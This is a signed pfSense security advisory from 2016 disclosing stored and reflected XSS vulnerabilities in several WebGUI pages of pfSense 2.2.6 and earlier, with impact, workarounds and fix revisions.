-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ============================================================================= pfSense-SA-16_02.webgui Security Advisory pfSense Topic: Multiple XSS and CSRF Vulnerabilities in the pfSense WebGUI Category: pfSense Base System Module: webgui Announced: 2016-04-01 Credits: Francesco Oddo - Security-Assessment.com Affects: pfSense < 2.3 Corrected: 2016-02-10 18:29:12 UTC (pfsense/RELENG_2_2, pfSense 2.2.x) 0. Revision History v1.0 2016-04-01 Initial release I. Background The pfSense® system is a free network firewall distribution based on the FreeBSD operating system. The pfSense system includes third-party free software packages for additional functionality, and provides most of the functionality of common commercial firewalls. The majority of users of pfSense software have never installed or used a stock FreeBSD system. Unlike similar GNU/Linux-based firewall distributions, there is no need for any UNIX knowledge. The command line is never used, and there is no need to ever manually edit any rule sets. Instead, pfSense software includes a web interface for the configuration of all included components. Users familiar with commercial firewalls will quickly understand the web interface, while those unfamiliar with commercial-grade firewalls may encounter a short learning curve. II. Problem Description Multiple Cross-Site Scripting (XSS) vulnerabilities were found in the pfSense WebGUI on pfSense 2.2.6 and earlier versions. On system_gateway_groups_edit.php, a gateway Description ("descr") was being printed without encoding, leading to a potential stored XSS. Multiple limiter parameters referenced on firewall_shaper_vinterface.php on pfSense 2.2.6 and earlier were printed without encoding when rejected by input validation, leading to a reflected XSS. The redesigned GUI used on pfSense 2.3 is not affected. The "container" parameter referenced on firewall_shaper_layer7.php on pfSense 2.2.6 and earleir was printed without encoding when rejected by input validation, leading to a reflected XSS. The Layer 7 feature is deprecated and had already been removed from the master branch (2.3), thus it is not affected. III. Impact Due to the lack of proper encoding on the affected variables and pages, arbitrary JavaScript can be executed in the user's browser. The user's session cookie or other information from the session may be compromised. IV. Workaround Upgrade to pfSense 2.3 or later which includes fixes for these issues. To mitigate the problem on older releases, use one or more of the following: * Limit access to the affected pages to trusted administrators only. * Do not log into the firewall with the same browser used for non- administrative web browsing. V. Solution Upgrade to pfSense 2.3. This may be performed in the web interface or from the console. See https://doc.pfsense.org/index.php/Upgrade_Guide VI. Correction details The following list contains the correction revision numbers for each affected item. Branch/path Revision - - ------------------------------------------------------------------------- pfSense/RELENG_2_2 08fb986ee6fcc2fd5ec24d3d22c67e76457a958f b76fd2a05664379c6752c5ee28c42462348d5d51 - - ------------------------------------------------------------------------- VII. References None. The latest revision of this advisory is available at -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBAgAGBQJXC+VVAAoJEBO5h/2SFPjajWcP/RrfZMmxVwScR9Wnn9AYl8hm vb+na+GOBa0uG6b4OVOtlP157cyEz5I++VZvDO9Ze5zCZi09JTGzmZKUUeEMgB0r YQxjmtlQ7jhcUIiQmoUgBz0Gecq9gTA11z6rw9yma+XzEV5cpqXTFaYu359I7e8b VRPgjeB1cZfJUo0PcnwnnySR9G2nUma0lJlragjFNFNl1ka2SaN10+IzY2oMy7Wm 4MWO2H79y/xm1mkX9xFJoeKwGAHcEjDLM0q1pn8XLMobvw5wp7rA7lj7PHELS7E1 voQfyoIP/f7h917BcnpIvG2dXRhZlCBaszeELvN0ft4chSwuQ4xkIVew492SXOpR DEMPRV40k6AJ0pBaxcb0Blm87G77voGgRN2sRVPgAlzZO/6VrMTcpXqvNtLbYJqB j3jVhWWEB3DKTdmbYvFQJ1TQgwGDzgKr7DkDEPUWs+Rj6iEBksg0UWJj3EGGU6x7 mT61AptcgJ5Xe82d/DCl/OiNe3wmXcHGObMGRi+7jRvDI+uJv6qMIz3zEcPzuazS 20AGoopB5otI/hmL139ap9OudeGSmCb/599atmRnPgLBHZDfDCVe7K/+eOjqZXNF bDu4Rb+1jt6tx03tvA/dt+pUdRobFMpoW8C4fStV/sRIvl5s3Vur6CuwzYCLJvcI 2a7+pzRiWdOERbmr7i85 =r7MV -----END PGP SIGNATURE-----